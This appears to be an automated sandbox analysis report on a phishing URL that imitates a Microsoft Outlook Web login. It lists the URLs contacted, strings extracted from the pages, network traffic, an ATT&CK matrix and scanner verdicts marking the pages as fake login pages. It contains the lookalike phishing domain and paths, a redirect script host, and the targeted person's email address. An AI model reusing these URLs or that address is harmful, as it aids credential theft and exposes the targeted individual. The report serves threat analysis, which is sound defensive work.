O-qUOvE7eVw7OyJS9Bde3YvMmmRm7vjPw3ICsUh-A4plYGhVdjE2DZG9tJiaWoRPLxae-65k-scxgv1sblnS1s_D5PF8kRWPYOun5Esc2Wlg-XjJzL6ZqC7w8VYxpjI6lw2V1MfHqZ4I9HWgN2zxWqlK8mGHKODNweOJo1ajnTxpmxPtlUlJqnZHl2-64q2oBqjUbJyE6jQ4HXfZAHBUVP6pQH1Ppda2Oiy9T99ahsDXa83x3bM3Nqw3wfeMuTBW2trZ3Eo8Se4mfG-Dd5nq5VP3X4Fm8W35v47c3sZC43KTbeUGhXaZChx5L94YLL2BYWirrejevdnhabQei5AiBaArlfbbAnKfBeTr9Iw1e3Ul8yfxv6-vtB-u_iBTkKMjvMbAA-QLi-n8B0%26estsfed%3d1%26lw%3d1%26fl%3deasi2%26fci%3d4345a7b9-9a63-4910-a426-35363201d503%26mkt%3den-US%26uaid%3d6c966c1f06fc4e1d975381b973bffd3f&mkt=EN-US&uiflavor=web&lw=1&fl=easi2&client_id=51483342-085c-4d86-bf88-cf50c7252078&uaid=6c966c1f06fc4e1d975381b973bffd3f&suc=4345a7b9-9a63-4910-a426-35363201d503&lic=1	HTTP Parser: No <meta name="author".. found
Source: https://signup.live.com/signup?ru=https%3a%2f%2flogin.live.com%2foauth20_authorize.srf%3flc%3d1033%26response_type%3dcode%26client_id%3d51483342-085c-4d86-bf88-cf50c7252078%26scope%3dopenid%2bprofile%2bemail%2boffline_access%26response_mode%3dform_post%26redirect_uri%3dhttps%253a%252f%252flogin.microsoftonline.com%252fcommon%252ffederation%252foauth2%26state%3drQIIAXVSPW_TUADMS9rQVAiqCgkWRAfEgOT42S-240gVavPROk3s5tNxlshxnMRx_OzYr7HsjY2xE0gZGGBA6sgELOydOvcXICbUCSSQSNlZbri74XR3z1NMlik8zaEcpwtDkRJ1HlE5kYGUnmN5CnGIRyxkRhxE_u72zpP56_nv9GP5Tevl5-DrnxcrkBnMraWZNVznAjycEuIFBZoOwzDrjseW8U-gPwFwBcA3AFbJTRNTndZFMuARL7ICQqKQzwl5huHZrKxWLKXUteV2mcglA8kRhFrctGrtCac5daLNunZ_1rS1uIzkkhT1VS2qtxuh7Kz97JqzIFSO6lytPbe1WZ3IR41YjitTWW3O-qUOvE7eVw7OyJS9Bde3YvMmmRm7vjPw3ICsUh-A4plYGhVdjE2DZG9tJiaWoRPLxae-65k-scxgv1sblnS1s_D5PF8kRWPYOun5Esc2Wlg-XjJzL6ZqC7w8VYxpjI6lw2V1MfHqZ4I9HWgN2zxWqlK8mGHKODNweOJo1ajnTxpmxPtlUlJqnZHl2-64q2oBqjUbJyE6jQ4HXfZAHBUVP6pQH1Ppda2Oiy9T99ahsDXa83x3bM3Nqw3wfeMuTBW2trZ3Eo8Se4mfG-Dd5nq5VP3X4Fm8W35v47c3sZC43KTbeUGhXaZChx5L94YLL2BYWirrejevdnhabQei5AiBaArlfbbAnKfBeTr9Iw1e3Ul8yfxv6-vtB-u_iBTkKMjvMbAA-QLi-n8B0%26estsfed%3d1%26lw%3d1%26fl%3deasi2%26fci%3d4345a7b9-9a63-4910-a426-35363201d503%26mkt%3den-US%26uaid%3d6c966c1f06fc4e1d975381b973bffd3f&mkt=EN-US&uiflavor=web&lw=1&fl=easi2&client_id=51483342-085c-4d86-bf88-cf50c7252078&uaid=6c966c1f06fc4e1d975381b973bffd3f&suc=4345a7b9-9a63-4910-a426-35363201d503&lic=1	HTTP Parser: No <meta name="author".. found
Source: https://ch1.amorozon.fr/.zz/908da3c8f209ef75ffb734f6652bf849/segring.php?https://autodiscover.domain.com/owa/#	HTTP Parser: No <meta name="author".. found
Source: https://ch1.amorozon.fr/.zz/908da3c8f209ef75ffb734f6652bf849/segring.php?https://autodiscover.domain.com/owa/#	HTTP Parser: No <meta name="author".. found
Source: https://ch1.amorozon.fr/.zz/908da3c8f209ef75ffb734f6652bf849/segring.php?https://autodiscover.domain.com/owa/#path=/mail	HTTP Parser: No <meta name="author".. found
Source: https://ch1.amorozon.fr/.zz/908da3c8f209ef75ffb734f6652bf849/segring.php?https://autodiscover.domain.com/owa/#path=/mail	HTTP Parser: No <meta name="author".. found

Source: https://signup.live.com/signup?ru=https%3a%2f%2flogin.live.com%2foauth20_authorize.srf%3flc%3d1033%26response_type%3dcode%26client_id%3d51483342-085c-4d86-bf88-cf50c7252078%26scope%3dopenid%2bprofile%2bemail%2boffline_access%26response_mode%3dform_post%26redirect_uri%3dhttps%253a%252f%252flogin.microsoftonline.com%252fcommon%252ffederation%252foauth2%26state%3drQIIAXVSPW_TUADMS9rQVAiqCgkWRAfEgOT42S-240gVavPROk3s5tNxlshxnMRx_OzYr7HsjY2xE0gZGGBA6sgELOydOvcXICbUCSSQSNlZbri74XR3z1NMlik8zaEcpwtDkRJ1HlE5kYGUnmN5CnGIRyxkRhxE_u72zpP56_nv9GP5Tevl5-DrnxcrkBnMraWZNVznAjycEuIFBZoOwzDrjseW8U-gPwFwBcA3AFbJTRNTndZFMuARL7ICQqKQzwl5huHZrKxWLKXUteV2mcglA8kRhFrctGrtCac5daLNunZ_1rS1uIzkkhT1VS2qtxuh7Kz97JqzIFSO6lytPbe1WZ3IR41YjitTWW3O-qUOvE7eVw7OyJS9Bde3YvMmmRm7vjPw3ICsUh-A4plYGhVdjE2DZG9tJiaWoRPLxae-65k-scxgv1sblnS1s_D5PF8kRWPYOun5Esc2Wlg-XjJzL6ZqC7w8VYxpjI6lw2V1MfHqZ4I9HWgN2zxWqlK8mGHKODNweOJo1ajnTxpmxPtlUlJqnZHl2-64q2oBqjUbJyE6jQ4HXfZAHBUVP6pQH1Ppda2Oiy9T99ahsDXa83x3bM3Nqw3wfeMuTBW2trZ3Eo8Se4mfG-Dd5nq5VP3X4Fm8W35v47c3sZC43KTbeUGhXaZChx5L94YLL2BYWirrejevdnhabQei5AiBaArlfbbAnKfBeTr9Iw1e3Ul8yfxv6-vtB-u_iBTkKMjvMbAA-QLi-n8B0%26estsfed%3d1%26lw%3d1%26fl%3deasi2%26fci%3d4345a7b9-9a63-4910-a426-35363201d503%26mkt%3den-US%26uaid%3d6c966c1f06fc4e1d975381b973bffd3f&mkt=EN-US&uiflavor=web&lw=1&fl=easi2&client_id=51483342-085c-4d86-bf88-cf50c7252078&uaid=6c966c1f06fc4e1d975381b973bffd3f&suc=4345a7b9-9a63-4910-a426-35363201d503&lic=1	HTTP Parser: No <meta name="copyright".. found
Source: https://signup.live.com/signup?ru=https%3a%2f%2flogin.live.com%2foauth20_authorize.srf%3flc%3d1033%26response_type%3dcode%26client_id%3d51483342-085c-4d86-bf88-cf50c7252078%26scope%3dopenid%2bprofile%2bemail%2boffline_access%26response_mode%3dform_post%26redirect_uri%3dhttps%253a%252f%252flogin.microsoftonline.com%252fcommon%252ffederation%252foauth2%26state%3drQIIAXVSPW_TUADMS9rQVAiqCgkWRAfEgOT42S-240gVavPROk3s5tNxlshxnMRx_OzYr7HsjY2xE0gZGGBA6sgELOydOvcXICbUCSSQSNlZbri74XR3z1NMlik8zaEcpwtDkRJ1HlE5kYGUnmN5CnGIRyxkRhxE_u72zpP56_nv9GP5Tevl5-DrnxcrkBnMraWZNVznAjycEuIFBZoOwzDrjseW8U-gPwFwBcA3AFbJTRNTndZFMuARL7ICQqKQzwl5huHZrKxWLKXUteV2mcglA8kRhFrctGrtCac5daLNunZ_1rS1uIzkkhT1VS2qtxuh7Kz97JqzIFSO6lytPbe1WZ3IR41YjitTWW3O-qUOvE7eVw7OyJS9Bde3YvMmmRm7vjPw3ICsUh-A4plYGhVdjE2DZG9tJiaWoRPLxae-65k-scxgv1sblnS1s_D5PF8kRWPYOun5Esc2Wlg-XjJzL6ZqC7w8VYxpjI6lw2V1MfHqZ4I9HWgN2zxWqlK8mGHKODNweOJo1ajnTxpmxPtlUlJqnZHl2-64q2oBqjUbJyE6jQ4HXfZAHBUVP6pQH1Ppda2Oiy9T99ahsDXa83x3bM3Nqw3wfeMuTBW2trZ3Eo8Se4mfG-Dd5nq5VP3X4Fm8W35v47c3sZC43KTbeUGhXaZChx5L94YLL2BYWirrejevdnhabQei5AiBaArlfbbAnKfBeTr9Iw1e3Ul8yfxv6-vtB-u_iBTkKMjvMbAA-QLi-n8B0%26estsfed%3d1%26lw%3d1%26fl%3deasi2%26fci%3d4345a7b9-9a63-4910-a426-35363201d503%26mkt%3den-US%26uaid%3d6c966c1f06fc4e1d975381b973bffd3f&mkt=EN-US&uiflavor=web&lw=1&fl=easi2&client_id=51483342-085c-4d86-bf88-cf50c7252078&uaid=6c966c1f06fc4e1d975381b973bffd3f&suc=4345a7b9-9a63-4910-a426-35363201d503&lic=1	HTTP Parser: No <meta name="copyright".. found
Source: https://ch1.amorozon.fr/.zz/908da3c8f209ef75ffb734f6652bf849/segring.php?https://autodiscover.domain.com/owa/#	HTTP Parser: No <meta name="copyright".. found
Source: https://ch1.amorozon.fr/.zz/908da3c8f209ef75ffb734f6652bf849/segring.php?https://autodiscover.domain.com/owa/#	HTTP Parser: No <meta name="copyright".. found
Source: https://ch1.amorozon.fr/.zz/908da3c8f209ef75ffb734f6652bf849/segring.php?https://autodiscover.domain.com/owa/#path=/mail	HTTP Parser: No <meta name="copyright".. found
Source: https://ch1.amorozon.fr/.zz/908da3c8f209ef75ffb734f6652bf849/segring.php?https://autodiscover.domain.com/owa/#path=/mail	HTTP Parser: No <meta name="copyright".. found

Source: privacystatement[1].htm.2.dr	String found in binary or memory: <ul><li>Sources of personal data: Interactions with users</li><li>Purposes of Processing (Collection and Sharing with Third Parties): Provide our products; product improvement; product development; customer support; and help, secure, and troubleshoot</li><li>Recipients: Service providers and user-directed entities</li></ul></li></ul><p>While the bulleted list above contains the primary sources and purposes of processing for each category of personal data, we also collect personal data from the sources listed in the <a target="_blank" class="mscom-link" href="#mainpersonaldatawecollect">Personal data we collect</a> section, such as developers who create experiences through or for Microsoft products. Similarly, we process all categories of personal data for the purposes described in the <a target="_blank" class="mscom-link" href="#mainhowweusepersonaldatamodule">How we use personal data</a> section, such as meeting our legal obligations, developing our workforce, and doing research.</p><p><strong>Disclosures of personal data for business or commercial purposes</strong>. As indicated in the <a target="_blank" class="mscom-link" href="#mainreasonswesharepersonaldatamodule">Reasons we share personal data</a> section, we share personal data with third parties for various business and commercial purposes. The primary business and commercial purposes for which we share personal data are the purposes of processing listed in the table above. However, we share all categories of personal data for the business and commercial purposes in the <a class="mscom-link" href="#mainreasonswesharepersonaldatamodule">Reasons we share personal data</a> section.</p></span></div><div class="divModuleDescription"><span id="Header">Advertising</span><span id="navigationHeader">Advertising</span><span id="moduleName">mainadvertisingmodule</span><div class="printsummary" style="display: block;">Summary</div><span class="Description" id="ShortDescription"><p>Advertising allows us to provide, support, and improve some of our products. Microsoft does not use what you say in email, chat, video calls or voice mail, or your documents, photos, or other personal files to target ads to you. We use other data, detailed below, for advertising in our products and on third-party properties. For example:</p><ul><li>Microsoft may use data we collect to select and deliver some of the ads you see on Microsoft web properties, such as <a target="_blank" class="mscom-link" href="https://www.microsoft.com">Microsoft.com</a>, MSN, and Bing.</li><li>When the advertising ID is enabled in Windows 10 as part of your privacy settings, third parties can access and use the advertising ID (much the same way that websites can access and use a unique identifier stored in a cookie) to select and deliver ads in such apps.</li><li>We may share data we collect with partners, such as Verizon Media, AppNexus, or Facebook (see below), so that the ads you see in our products and their products are more r
Source: privacystatement[1].htm.2.dr	String found in binary or memory: s <a target="_blank" class="mscom-link" href="https://www.linkedin.com/legal/privacy-policy">Privacy Policy</a>.</p></span></div><div class="divModuleDescription"><span id="Header">Search, Microsoft Edge, and artificial intelligence</span><span id="navigationHeader">Search, Microsoft Edge, and artificial intelligence</span><span id="moduleName">mainsearchaimodule</span><div class="printsummary" style="display: block;">Summary</div><span class="Description" id="ShortDescription" aria-expanded="false"><p>Search and artificial intelligence products connect you with information and intelligently sense, process, and act on information equals www.linkedin.com (Linkedin)
Source: privacystatement[1].htm.2.dr	String found in binary or memory: s health, oral health, osteoporosis, skin health, sleep, and vision / eye care. We will also personalize ads based on custom, non-sensitive health-related interest categories as requested by advertisers.</li><li><strong>Children and advertising</strong>. We do not deliver personalized advertising to children whose birthdate in their Microsoft account identifies them as under 16 years of age.</li><li><strong>Data retention</strong>. For personalized advertising, we retain data for no more than 13 months, unless we obtain your consent to retain the data longer.</li><li><strong>Data sharing</strong>. In some cases, we share with advertisers reports about the data we have collected on their sites or ads.</li></ul><p><strong>Data collected by other advertising companies</strong>. Advertisers sometimes include their own web beacons (or those of their other advertising partners) within their advertisements that we display, enabling them to set and read their own cookie. Additionally, Microsoft partners with third-party ad companies to help provide some of our advertising services, and we also allow other third-party ad companies to display advertisements on our sites. These third parties may place cookies on your computer and collect data about your online activities across websites or online services. These companies currently include, but are not limited to: <a target="_blank" class="mscom-link" href="https://www.appnexus.com/">AppNexus</a>, <a target="_blank" class="mscom-link" href="https://www.facebook.com/help/568137493302217">Facebook</a>, <a target="_blank" class="mscom-link" href="https://www.media.net/adchoices">Media.net</a>, <a target="_blank" class="mscom-link" href="https://my.outbrain.com/recommendations-settings/home">Outbrain</a>, <a target="_blank" class="mscom-link" href="https://www.taboola.com/privacy-policy#user-choices-and-optout">Taboola</a> and <a target="_blank" class="mscom-link" href="https://www.verizonmedia.com/policies/us/en/verizonmedia/privacy/index.html">Verizon Media</a>. Select any of the preceding links to find more information on each company's practices, including the choices it offers. Many of these companies are also members of the <a target="_blank" class="mscom-link" href="https://www.networkadvertising.org/managing/opt_out.aspx">NAI</a> or <a target="_blank" class="mscom-link" href="https://www.aboutads.info/choices/">DAA</a>, which each provide a simple way to opt out of ad targeting from participating companies.</p></span></div><div class="divModuleDescription"><span id="Header">Collection of data from children</span><span id="navigationHeader">Collection of data from children</span><span id="moduleName">maincollectionofdatafromchildrenmodule</span><div class="printsummary" style="display: block;">Summary</div><span class="Description" id="ShortDescription"><p>When a Microsoft product collects age, and there is an age in your jurisdiction under which parental consent or authorization is required to use the p

Source: unknown

DNS traffic detected: queries for: ch1.amorozon.fr

Source: icons[1].eot.2.dr	String found in binary or memory: http://fontello.com
Source: icons[1].eot.2.dr	String found in binary or memory: http://fontello.comiconsRegulariconsiconsVersion
Source: 50-f1e180[1].js.2.dr	String found in binary or memory: http://github.com/requirejs/almond/LICENSE
Source: jquerypackage_1.10_5V7LAuc3bNAQx2QQfr1RPw2[1].js.2.dr	String found in binary or memory: http://jquery.com/
Source: jquerypackage_1.10_5V7LAuc3bNAQx2QQfr1RPw2[1].js.2.dr	String found in binary or memory: http://jquery.org/license
Source: knockout_3.3.0_X1BYS2jZMbi7hfUj8VuqFA2[1].js.2.dr	String found in binary or memory: http://knockoutjs.com/
Source: knockout_3.3.0_X1BYS2jZMbi7hfUj8VuqFA2[1].js.2.dr	String found in binary or memory: http://opensource.org/licenses/mit-license.php)
Source: jquerypackage_1.10_5V7LAuc3bNAQx2QQfr1RPw2[1].js.2.dr	String found in binary or memory: http://sizzlejs.com/
Source: privacystatement[1].htm.2.dr	String found in binary or memory: http://www.asp.net/ajaxlibrary/CDN.ashx.
Source: knockout_3.3.0_X1BYS2jZMbi7hfUj8VuqFA2[1].js.2.dr	String found in binary or memory: http://www.json.org/json2.js
Source: knockout_3.3.0_X1BYS2jZMbi7hfUj8VuqFA2[1].js.2.dr	String found in binary or memory: http://www.opensource.org/licenses/mit-license.php)
Source: segring[1].htm.2.dr	String found in binary or memory: https://aadcdn.msauth.net/ests/2.1/content/images/ellipsis_grey_2b5d393db04a5e6e1f739cb266e65b4c.svg
Source: segring[1].htm.2.dr	String found in binary or memory: https://aadcdn.msauth.net/ests/2.1/content/images/ellipsis_grey_5bc252567ef56db648207d9c36a9d004.png
Source: segring[1].htm.2.dr	String found in binary or memory: https://aadcdn.msauth.net/ests/2.1/content/images/ellipsis_white_0ad43084800fd8b50a2576b5173746fe.pn
Source: segring[1].htm.2.dr	String found in binary or memory: https://aadcdn.msauth.net/ests/2.1/content/images/ellipsis_white_5ac590ee72bfe06a7cecfd75b588ad73.sv
Source: signup[1].htm.2.dr	String found in binary or memory: https://acctcdn.msauth.net
Source: signup[1].htm.2.dr	String found in binary or memory: https://acctcdn.msauth.net/converged_ux_v2_RfnRCrmapm3W_OFn994CMA2.css?v=1
Source: signup[1].htm.2.dr	String found in binary or memory: https://acctcdn.msauth.net/images/2_vD0yppaJX3jBnfbHF1hqXQ2.svg)
Source: imagestore.dat.2.dr, signup[1].htm.2.dr	String found in binary or memory: https://acctcdn.msauth.net/images/favicon.ico?v=2
Source: imagestore.dat.2.dr	String found in binary or memory: https://acctcdn.msauth.net/images/favicon.ico?v=2~
Source: imagestore.dat.2.dr	String found in binary or memory: https://acctcdn.msauth.net/images/favicon.ico?v=2~(
Source: signup[1].htm.2.dr	String found in binary or memory: https://acctcdn.msauth.net/images/microsoft_logo_7lyNn7YkjJOP0NwZNw6QvQ2.svg
Source: signup[1].htm.2.dr	String found in binary or memory: https://acctcdn.msauth.net/jquerypackage_1.10_5V7LAuc3bNAQx2QQfr1RPw2.js?v=1
Source: signup[1].htm.2.dr	String found in binary or memory: https://acctcdn.msauth.net/knockout_3.3.0_X1BYS2jZMbi7hfUj8VuqFA2.js?v=1
Source: signup[1].htm.2.dr	String found in binary or memory: https://acctcdn.msauth.net/lightweightsignuppackage_oZIcfFtGMdm_yHyDEji_8w2.js?v=1
Source: signup[1].htm.2.dr	String found in binary or memory: https://acctcdn.msauth.net/lwsignupstringscountrybirthdate_en-us_pVtahKS9WUIZdNqg1DDhHg2.js?v=1
Source: segring[1].htm.2.dr	String found in binary or memory: https://ajax.googleapis.com/ajax/libs/jquery/2.1.1/jquery.min.js
Source: {32E83695-30D8-11EB-90EB-ECF4BBEA1588}.dat.1.dr	String found in binary or memory: https://autodiscover.domain.com/owa/
Source: 908da3c8f209ef75ffb734f6652bf849[1].htm0.2.dr	String found in binary or memory: https://autodiscover.domain.com/owa/#path=/mail
Source: {32E83695-30D8-11EB-90EB-ECF4BBEA1588}.dat.1.dr	String found in binary or memory: https://autodiscover.domain.com/owa/#th=/maRoot
Source: {32E83695-30D8-11EB-90EB-ECF4BBEA1588}.dat.1.dr	String found in binary or memory: https://autodiscover.domain.com/owa/#th=/mail
Source: {32E83695-30D8-11EB-90EB-ECF4BBEA1588}.dat.1.dr	String found in binary or memory: https://autodiscover.domain.com/owa/#th=/maode%26client_id%3d51483342-085c-
Source: {32E83695-30D8-11EB-90EB-ECF4BBEA1588}.dat.1.dr	String found in binary or memory: https://autodiscover.domain.com/owa/$
Source: signup[1].htm.2.dr	String found in binary or memory: https://az416426.vo.msecnd.net/scripts/c/ms.analytics-web-2.min.js
Source: {32E83695-30D8-11EB-90EB-ECF4BBEA1588}.dat.1.dr	String found in binary or memory: https://ch1.amorozon.f
Source: 908da3c8f209ef75ffb734f6652bf849[1].htm.2.dr, ~DF7977F7404D051671.TMP.1.dr	String found in binary or memory: https://ch1.amorozon.fr/.zz/908da3c8f209ef75ffb734f6652bf849/
Source: {32E83695-30D8-11EB-90EB-ECF4BBEA1588}.dat.1.dr	String found in binary or memory: https://ch1.amorozon.fr/.zz/908da3c8f209ef75ffb734f6652bf849/Root
Source: imagestore.dat.2.dr	String found in binary or memory: https://ch1.amorozon.fr/.zz/908da3c8f209ef75ffb734f6652bf849/include/src/favicon_a_eupayfgghqiai7k9s
Source: {32E83695-30D8-11EB-90EB-ECF4BBEA1588}.dat.1.dr	String found in binary or memory: https://ch1.amorozon.fr/.zz/908da3c8f209ef75ffb734f6652bf849/r/.zz/908da3c8f209ef75ffb734f6652bf849/
Source: ~DF7977F7404D051671.TMP.1.dr	String found in binary or memory: https://ch1.amorozon.fr/.zz/908da3c8f209ef75ffb734f6652bf849/segring.php?https://autodiscover.domain
Source: {32E83695-30D8-11EB-90EB-ECF4BBEA1588}.dat.1.dr	String found in binary or memory: https://ch1.amorozon.fr/.zz/908da3c8f209ef75ffb734f6652bf849/segring.php?https://m_post%26redirect_u
Source: .zz[1].htm.2.dr	String found in binary or memory: https://ch1.amorozon.fr/.zz/?&78387439&user=jon.parr
Source: privacystatement[1].htm.2.dr	String found in binary or memory: https://developer.yahoo.com/flurry/end-user-opt-out/
Source: privacystatement[1].htm.2.dr	String found in binary or memory: https://ec.europa.eu/info/law/law-topic/data-protection/data-transfers-outside-eu/adequacy-protectio
Source: signup[1].htm.2.dr	String found in binary or memory: https://github.com/douglascrockford/JSON-js
Source: app[1].css.2.dr	String found in binary or memory: https://github.com/h5bp/html5-boilerplate/blob/master/src/css/main.css
Source: sc_login[1].js.2.dr	String found in binary or memory: https://goips.net/background-redirect/index.php
Source: signup[1].htm.2.dr	String found in binary or memory: https://login.live.com
Source: segring[1].htm.2.dr	String found in binary or memory: https://login.live.com/oauth20_authorize.srf?response_type=code&client_id=51483342-085c-4d86-bf8
Source: sc_login[1].js.2.dr	String found in binary or memory: https://login.microsoftonline.com
Source: privacystatement[1].htm.2.dr	String found in binary or memory: https://login.skype.com/login
Source: privacystatement[1].htm.2.dr	String found in binary or memory: https://mixpanel.com/optout
Source: privacystatement[1].htm.2.dr	String found in binary or memory: https://ondemand.webtrends.com/support/optout.asp
Source: privacystatement[1].htm.2.dr	String found in binary or memory: https://priv-policy.imrworldwide.com/priv/browser/us/en/optout.html
Source: {32E83695-30D8-11EB-90EB-ECF4BBEA1588}.dat.1.dr	String found in binary or memory: https://privacy.micros
Source: privacystatement[1].htm.2.dr	String found in binary or memory: https://signin.kissmetrics.com/privacy/#controls
Source: {32E83695-30D8-11EB-90EB-ECF4BBEA1588}.dat.1.dr	String found in binary or memory: https://signup.live.co
Source: {32E83695-30D8-11EB-90EB-ECF4BBEA1588}.dat.1.dr	String found in binary or memory: https://signup.live.com/
Source: signup[1].htm.2.dr	String found in binary or memory: https://signup.live.com/error.aspx?errcode=1045&mkt=en-US
Source: {32E83695-30D8-11EB-90EB-ECF4BBEA1588}.dat.1.dr, ~DF7977F7404D051671.TMP.1.dr	String found in binary or memory: https://signup.live.com/signup?ru=https%3a%2f%2flogin.live.com%2foauth20_authorize.srf%3flc%3d1033%2
Source: privacystatement[1].htm.2.dr	String found in binary or memory: https://support.xbox.com/help/friends-social-activity/community/use-safety-settings
Source: privacystatement[1].htm.2.dr	String found in binary or memory: https://tools.google.com/dlpage/gaoptout
Source: privacystatement[1].htm.2.dr	String found in binary or memory: https://www.aboutads.info/
Source: privacystatement[1].htm.2.dr	String found in binary or memory: https://www.acuityads.com/opt-out/
Source: privacystatement[1].htm.2.dr	String found in binary or memory: https://www.adjust.com/opt-out/
Source: privacystatement[1].htm.2.dr	String found in binary or memory: https://www.appnexus.com/
Source: privacystatement[1].htm.2.dr	String found in binary or memory: https://www.appsflyer.com/optout
Source: privacystatement[1].htm.2.dr	String found in binary or memory: https://www.clicktale.net/disable.html
Source: privacystatement[1].htm.2.dr	String found in binary or memory: https://www.here.com/)
Source: privacystatement[1].htm.2.dr	String found in binary or memory: https://www.linkedin.com/legal/privacy-policy
Source: privacystatement[1].htm.2.dr	String found in binary or memory: https://www.macromedia.com/support/documentation/en/flashplayer/help/settings_manager.html
Source: privacystatement[1].htm.2.dr	String found in binary or memory: https://www.optimizely.com/legal/opt-out/
Source: privacystatement[1].htm.2.dr	String found in binary or memory: https://www.privacyshield.gov/welcome
Source: privacystatement[1].htm.2.dr	String found in binary or memory: https://www.xbox.com
Source: privacystatement[1].htm.2.dr	String found in binary or memory: https://www.xbox.com/
Source: privacystatement[1].htm.2.dr	String found in binary or memory: https://www.xbox.com/Legal/ThirdPartyDataSharing
Source: privacystatement[1].htm.2.dr	String found in binary or memory: https://www.xbox.com/managedatacollection
Source: privacystatement[1].htm.2.dr	String found in binary or memory: https://www.youradchoices.ca
Source: privacystatement[1].htm.2.dr	String found in binary or memory: https://www.youradchoices.ca/fr
Source: privacystatement[1].htm.2.dr	String found in binary or memory: https://www.youronlinechoices.com/

Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49724 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49729 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49729
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49724
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49723
Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 443

Source: classification engine

Classification label: mal76.phis.win@3/52@8/3

Source: C:\Program Files\internet explorer\iexplore.exe

File created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{32E83693-30D8-11EB-90EB-ECF4BBEA1588}.dat

Jump to behavior

Source: C:\Program Files\internet explorer\iexplore.exe

File created: C:\Users\user\AppData\Local\Temp\~DF61A1327D3F69D777.TMP

Jump to behavior

Source: C:\Program Files\internet explorer\iexplore.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: unknown	Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Source: unknown	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:2044 CREDAT:17410 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:2044 CREDAT:17410 /prefetch:2	Jump to behavior

Source: C:\Program Files\internet explorer\iexplore.exe	Automated click: Next
Source: C:\Program Files\internet explorer\iexplore.exe	Automated click: Next

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe

File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll

Jump to behavior

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Scripting1	Path Interception	Process Injection1	Masquerading1	OS Credential Dumping	File and Directory Discovery1	Remote Services	Data from Local System	Exfiltration Over Other Network Medium	Encrypted Channel2	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Process Injection1	LSASS Memory	Application Window Discovery	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	Non-Application Layer Protocol1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Scripting1	Security Account Manager	Query Registry	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Application Layer Protocol2	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
https://ch1.amorozon.fr/.zz?&78387439&user=jon.parr@syngenta.com	0%	Avira URL Cloud	safe
https://ch1.amorozon.fr/.zz?&78387439&user=jon.parr@syngenta.com	100%	UrlScan	phishing brand: microsoft	Browse

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

Source	Detection	Scanner	Label	Link
goips.net	0%	Virustotal		Browse
sni1gl.wpc.alphacdn.net	0%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label
https://ch1.amorozon.fr/.zz/908da3c8f209ef75ffb734f6652bf849/segring.php?https://autodiscover.domain.com/owa/#	100%	SlashNext	Fake Login Page type: Phishing & Social Engineering
https://ch1.amorozon.fr/.zz/908da3c8f209ef75ffb734f6652bf849/segring.php?https://autodiscover.domain.com/owa/#path=/mail	100%	SlashNext	Fake Login Page type: Phishing & Social Engineering
https://ch1.amorozon.fr/.zz/908da3c8f209ef75ffb734f6652bf849/segring.php?https://autodiscover.domain	0%	Avira URL Cloud	safe
https://ch1.amorozon.f	0%	Avira URL Cloud	safe
https://acctcdn.msauth.net	0%	URL Reputation	safe
https://acctcdn.msauth.net	0%	URL Reputation	safe
https://acctcdn.msauth.net	0%	URL Reputation	safe
https://www.youradchoices.ca/fr	0%	URL Reputation	safe
https://www.youradchoices.ca/fr	0%	URL Reputation	safe
https://www.youradchoices.ca/fr	0%	URL Reputation	safe
https://acctcdn.msauth.net/lwsignupstringscountrybirthdate_en-us_pVtahKS9WUIZdNqg1DDhHg2.js?v=1	0%	URL Reputation	safe
